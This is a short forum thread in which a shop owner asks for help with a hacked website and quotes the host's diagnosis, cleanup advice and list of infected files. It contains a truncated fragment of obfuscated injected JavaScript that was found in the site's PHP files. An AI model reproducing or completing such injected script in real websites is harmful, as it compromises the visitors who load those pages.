Web site hacked

Closed
sf - Aug 19, 2010 at 03:45 AM
 sf - Aug 19, 2010 at 04:39 PM
Hello,
My website is hacked can someone help me

1 response

BITSAXIS Posts 19 Registration date Sunday March 14, 2010 Status Member Last seen August 24, 2011
Aug 19, 2010 at 03:48 AM
hi

you do not give as a lot of info for helping you.
my hosting account is through www.siteground.com
Info that was given to me by them hope this info is enough.
My site is snsdesigns.com (fashion jewelry)

It seems that your account has been hacked. The code which was implemented is:

?><script>function lI(){};eJS=23886;lI.prototype = {o : function() {var j="j";var lM="lM";fu=1907;xA=false;var q = this;var rG="rG";function qF(){};var f=documen

Fatal error: require_once() [function.require]: Failed opening required '/home/snsdesig/public_html/ext/HTMLPurifier/HTMLPurifier.auto.php' (include_path='.:/usr/local/php52/pear') in /home/snsdesig/public_html/includes/application_top.php on line 179

You can clean your website's files and upgrade the application by yourself. In order to do that you can download the files to your local computer and perform the cleaning of the malicious code locally with a text/HTML editor of your choice.

Alternatively you can restore your website from the most recent non-infected backup of yours by re-uploading the files via FTP as explained in the following tutorial of ours:

As it seems, your site has been hacked. These are some of the files which contain malicious code:

index.php
GA_sitemap_pages.php
GA_sitemap_pages_categories.php
GA_sitemap_products.php
Order_Info.php
Order_Info_Process.php
TMP0003V64/creseourls/seo_urls_install.html
TMP0003V64/Template Only Install/templates/9171/main_page.tpl.php
TMP0003V64/Template Only Install/templates/9171/extra_html_output.php
TMP0003V64/Template Only Install/templates/9171/boxes/shopping_cart